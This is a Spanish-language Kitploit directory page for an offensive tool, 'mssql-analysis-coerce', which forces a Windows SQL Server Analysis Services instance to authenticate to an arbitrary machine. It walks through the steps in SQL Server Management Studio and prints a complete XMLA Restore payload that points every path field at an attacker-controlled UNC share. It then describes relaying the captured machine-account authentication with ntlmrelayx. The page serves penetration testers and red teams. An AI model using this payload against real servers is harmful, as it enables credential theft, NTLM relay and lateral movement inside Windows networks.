Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
MSSQL-Analysis-Coerce — Una técnica para forzar a un Windows SQL Server a autenticarse en una máquina arbitraria. | Kitploit
Herramientas/GitHubGitHub/p0dalirius/mssql-analysis-coerce
ExplotaciónMovimiento LateralPost-ExplotaciónPruebas de PenetraciónRed TeamingAtaque Adversario
GitHubp0dalirius/mssql-analysis-coerce

MSSQL-Analysis-Coerce

Una técnica para forzar a un Windows SQL Server a autenticarse en una máquina arbitraria.

Ver Repositorio
13313hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

MSSQL Analysis Services - Autenticación Forzada

Una técnica para obligar a un Windows SQL Server a autenticarse en una máquina arbitraria.

Esta prueba de concepto está coescrita por:

  • Podalirius: YouTube Channel Subscribers
  • Worty:

Prueba de concepto

Para provocar la autenticación como cuenta de máquina local, necesitamos conectarnos al SQL Server remoto usando credenciales de usuario:

Luego seleccionaremos "Restore" para restaurar la base de datos desde un archivo determinado.

Para generar el archivo XMLA, coloca la ruta a un archivo aleatorio en el formulario "Backup File" y haz clic en OK.

Luego cambia la ruta a un archivo aleatorio y reemplázala por una ruta UNC a tu servidor atacante (por ejemplo \\192.168.128\SYSVOL\db.abf)

Consulta XMLA de la prueba de concepto (poc.xmla):

root@kitploit:~
<Restore xmlns="http://schemas.microsoft.com/analysisservices/2003/engine">
    <File>\\192.168.2.51\SYSVOL\db.abf</File>
    <DatabaseName>\\192.168.2.51\SYSVOL\db.abf</DatabaseName>
    <DbStorageLocation xmlns="http://schemas.microsoft.com/analysisservices/2008/engine/100/100">\\192.168.2.51\SYSVOL\db.abf</DbStorageLocation>
</Restore>

Y obtenemos una autenticación desde la cuenta de máquina local del SQL Server:

Relay para ganar

Una vez que obtenemos la autenticación, podemos retransmitirla con ntlmrelayx para realizar muchas acciones en nombre del equipo SQL01$.

Esto es interesante, pero es complicado provocar esta autenticación forzada desde una máquina atacante Linux, ya que no tenemos acceso a SQL Server Management Studio (SSMS).

Referencias

  • https://docs.microsoft.com/en-us/sql/database-engine/install-windows/install-sql-server?view=sql-server-ver15
  • https://social.technet.microsoft.com/wiki/contents/articles/13106.sql-server-frequently-used-ports.aspx
  • https://docs.microsoft.com/en-us/answers/questions/274512/connecting-to-azure-analysis-services-using-python.html
Descargar herramienta